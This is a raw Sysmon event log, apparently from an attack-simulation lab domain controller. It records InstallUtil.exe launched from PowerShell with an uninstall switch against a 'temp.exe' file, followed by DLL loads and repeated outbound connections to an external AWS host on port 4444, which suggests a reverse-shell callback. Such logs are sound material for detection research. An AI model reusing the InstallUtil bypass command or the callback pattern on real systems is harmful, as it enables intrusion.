NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7e5-0x5eac29da) 734700x800000000000000057562545Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=9C0F4F0DC954D96E7D70E5FBD85D7EE6,SHA256=A4C9BBF0836A49DADBDD87ED8372D290CCC0A0177B0D4B484AD18DC9C7BCC073trueMicrosoft CorporationValid 734700x800000000000000057562544Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValid 734700x800000000000000057562543Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValid 734700x800000000000000057562542Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValid 734700x800000000000000057562541Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValid 734700x800000000000000057562540Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValid 734700x800000000000000057562539Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F7E6254059E93E3FBD7FE0E3C5615605,SHA256=1AD1D4229C9FF3B4D041E4B4973A83BE2078EECD11E9EC00E4C0B42EAB20E07AtrueMicrosoft WindowsValid 734700x800000000000000057562538Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValid 734700x800000000000000057562537Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValid 734700x800000000000000057562536Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=6FDB4F1612AC70891B9F6E6005AA5DDB,SHA256=6DFEC2EE6E2A7CB4409AB824737A3657E6D66E309AFE83C28E0CE0676687F737trueMicrosoft WindowsValid 734700x800000000000000057562535Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValid 734700x800000000000000057562534Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=606B77C072A964DA4E4710151CAC86EB,SHA256=C6C9E8D77B62C7A52E6E9EAC764C1E1345779FC17544B80730E507627A5D5120trueMicrosoft CorporationValid 734700x800000000000000057562533Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=D1F45F71014220112988A7BF64EE83EE,SHA256=60E8C6D420FC4AFF309FE9CB53327D8DC4EC541F627E4461C465561512D1ED5DtrueMicrosoft WindowsValid 734700x800000000000000057562532Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValid 734700x800000000000000057562531Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=580643DD40890B231399EA5F57EFAA70,SHA256=0B374B1825ABFF7B26170E75F1B638DF08A15B07660A7DF5533F02853CF266C6trueMicrosoft WindowsValid 734700x800000000000000057562530Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=990CA13B9FE19A5A611F77B333BC9AAD,SHA256=EC3960CAABA4FC0287601311BDCC14D472A165DA7C43F88665D984CE1A0B7DE4trueMicrosoft WindowsValid 734700x800000000000000057562529Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=3394E4EEB4851D80DD7548EC87EAEA5F,SHA256=7F670ACCE58EAADE796FEF335B4EAEAB66DFC47875219B9BE3C9B405A452450BtrueMicrosoft WindowsValid 734700x800000000000000057562528Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValid 734700x800000000000000057562527Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A1EDD29F959E38F8AE4AF9B5CDD2B534,SHA256=CE5ECDC3BEFA2DC8C826A697EAC6CDAC12753258315701130CDEDB19D24DBC75trueMicrosoft WindowsValid 10341000x800000000000000057562526Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-EC34-6172-7AB6-01000000F101}931610168C:\Windows\system32\conhost.exe{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057562525Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=E3B7B5531159A395AC63B7EA256FE7B6,SHA256=B631E93E271E706E0204B606D7851ADF7E65FCA04ACDD73103F0754A9C01007EtrueMicrosoft WindowsValid 734700x800000000000000057562524Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E0C87CF8838DB8C6DBD24A708FCED51B,SHA256=0616E630C7F8E116CE43390638C9CE99209556662C2BBDF5845F1CD03E1C6C4EtrueMicrosoft WindowsValid 734700x800000000000000057562523Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=2582AA6C1F88D34B37B7F82D790D232E,SHA256=AA948BB6583057E2E2F299EBD1717A42D6559CA27AF6BC756D3C3BB4109E4E77trueMicrosoft WindowsValid 734700x800000000000000057562522Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValid 734700x800000000000000057562521Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057562520Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057562519Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E0C87CF8838DB8C6DBD24A708FCED51B,SHA256=0616E630C7F8E116CE43390638C9CE99209556662C2BBDF5845F1CD03E1C6C4EtrueMicrosoft WindowsValid 734700x800000000000000057562518Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057562517Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValid 734700x800000000000000057562516Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValid 734700x800000000000000057562515Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4EA36017E45CC2C5D3D2EABEFBE25941,SHA256=6E96551961497DBE66E0329711E4AC670713DF9315B948D7CB5EEAE8C757292FtrueMicrosoft WindowsValid 734700x800000000000000057562514Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057562513Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=AF862061889F5B9B956E9469DCDAE773,SHA256=AF5CBD35C7D8DEA7D879113FDA61B0F64AC6618BCDAE15C0C732A018BABF68EEtrueMicrosoft CorporationValid 10341000x800000000000000057562512Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-888A-6164-7000-00000000F101}34483444C:\Windows\system32\csrss.exe{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057562511Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.638{8B6011A9-EC34-6172-79B6-01000000F101}86407060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+50f0099(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45734f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+457312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b45b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4573c13(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4573785(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45734f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+457312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b45b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45583d8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+455794a(wow64) 154100x800000000000000057562510Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.628{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" /logfile= /LogToConsole=false /U .\temp.exeC:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=AF862061889F5B9B956E9469DCDAE773,SHA256=AF5CBD35C7D8DEA7D879113FDA61B0F64AC6618BCDAE15C0C732A018BABF68EE{8B6011A9-EC34-6172-79B6-01000000F101}8640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 354300x800000000000000057562619Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:49.297{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59239-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562618Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:49.295{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59238-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562617Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:49.292{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59237-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 12241200x800000000000000057562630Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:21.750{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057562644Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:54.308{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59244-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562643Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:54.306{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59243-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562642Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:54.303{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59242-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 12241200x800000000000000057562649Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:26.765{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057562659Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:59.324{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59248-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com4444- 354300x800000000000000057562658Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 